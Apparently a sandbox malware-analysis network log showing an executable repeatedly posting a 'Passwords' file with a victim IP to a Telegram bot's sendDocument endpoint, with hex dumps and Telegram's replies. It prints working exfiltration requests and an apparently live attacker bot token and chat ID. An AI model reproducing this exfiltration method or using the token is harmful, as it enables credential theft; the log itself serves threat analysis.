                                                                                                          2025-01-10 21:14:43 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd325ab7612621
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:43 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 61 62 37 36 31 32 36 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd325ab7612621Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:43 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:43 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:43 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43563,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543683,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.749992149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:45 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32706e536ece
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 30 36 65 35 33 36 65 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32706e536eceContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:45 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:45 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:45 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43564,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543685,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.749994149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:46 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3284b98947fb
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:46 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 34 62 39 38 39 34 37 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3284b98947fbContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:47 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:47 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:47 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43565,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543687,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.749996149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:48 UTC299OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd329cff2c8b35
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 21:14:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 63 66 66 32 63 38 62 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd329cff2c8b35Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:49 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:49 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:49 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43566,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543689,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.749998149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:50 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32ae783eaad9
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:50 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 65 37 38 33 65 61 61 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32ae783eaad9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:51 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:50 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:51 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43567,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543690,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.750000149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:52 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32c53cdad8c3
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:52 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 35 33 63 64 61 64 38 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32c53cdad8c3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:53 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:53 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:53 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 39 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43568,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543693,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.750002149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:55 UTC299OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32d9402b67ea
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 21:14:55 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 39 34 30 32 62 36 37 65 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32d9402b67eaContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:55 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:55 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:55 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 39 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43569,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543695,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.750004149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:57 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32ed305fb91e
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
